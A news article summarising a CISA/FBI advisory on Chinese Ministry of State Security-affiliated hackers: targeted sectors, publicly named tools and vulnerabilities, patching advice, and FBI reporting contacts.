Feds Say China’s MSS Affiliated Hackers Using Open Source Info to Plan, Execute Cyber Ops
The Department of Homeland Security (DHS) Cybersecurity and Infrastructure Security Agency (CISA) and the Federal Bureau of Investigation (FBI) issued a joint Cybersecurity Advisory Alert AA20-258A. The alert details attack vectors used by China’s Ministry of State Security (MSS) affiliated cyber threat actors for targeting U.S. government agencies.
China’s MSS intelligence service aggressively targets the United States government agencies and private companies. It is believed that China uses diplomats, tourists, and Chinese students to help conduct their covert operations in the United States.
The threat actors operate from within the People’s Republic of China (PRC). The attack vectors detailed in the advisory are the same as those typically deployed by Chinese MSS-affiliated actors, says the CISA alert.
Over the last ten years, MSS hackers targeted:
- high-tech manufacturing organizations
- medical device manufacturers
- civil, and industrial engineering firms
- business, educational, and gaming software
- solar energy sector
- pharmaceutical companies
- defense sector
MSS Tactics, Techniques, and Procedures (TTPs)
MSS uses publicly available information like Shodan, the Common Vulnerabilities and Exposure (CVE) database, and the National Vulnerabilities Database (NVD) to identify targets.
CISA has observed MSS using Mimikatz, an open-source tool, to capture federal account login credentials. They also used Cobalt Strike a commercially available penetration testing tool to target commercial and Federal Government networks. MSS has been observed scanning a Federal Government agency for vulnerable web servers and scanning for known vulnerable network appliance CVE-2019-11510.
China Chopper Web Shell is another open-source tool used by MSS in web application attacks against IT networks.
Common and effective TTPs employed by MSS cyber threat actors:
- Open source information to plan and carry out cyberattacks
- Exploit vulnerabilities and unpatched networks
- Spear phishing email campaigns
- Collect Emails from Federal Government sites
The FBI and CISA emphasize that, “If critical vulnerabilities remain unpatched, cyber threat actors can carry out attacks without the need to develop custom malware and exploits or use previously unknown vulnerabilities to target a network.” Implementation of robust configuration and patch management programs greatly increases network security
Patching devices, networks, and systems is the best defense against MSS threat actors as well as other cybercriminals.
“When sophisticated cyber threat actors conduct operations against soft targets, it can negatively impact critical infrastructure, federal, and state, local, tribal, territorial government networks, possibly resulting in loss of critical data or personally identifiable information,” says the security advisory.
Chinese Ministry of State Security (MSS)
The People Republic of China (PRC) Ministry of State Security – officially Guangdong State Security Department (GSSD) of the Ministry of State Security (MSS) – is a clandestine intelligence agency founded in 1963. MSS operates under the National Security Commission of the Communist Party (CCP) of China which was established in 2013. It is an intelligence, security, and secret police agency responsible for counter-intelligence, foreign intelligence, and political security.
CISA and the FBI recommend that system administrators regularly audit their configuration and patch management to ensure they can track and mitigate rising threats.
How to Report Chinese Threat Actors
To report suspicious or criminal cyber activity, contact a local FBI field office at www.fbi.gov/contact-us/field. Or call the FBI’s 24/7 Cyber Watch (CyWatch) at (855) 292-3937.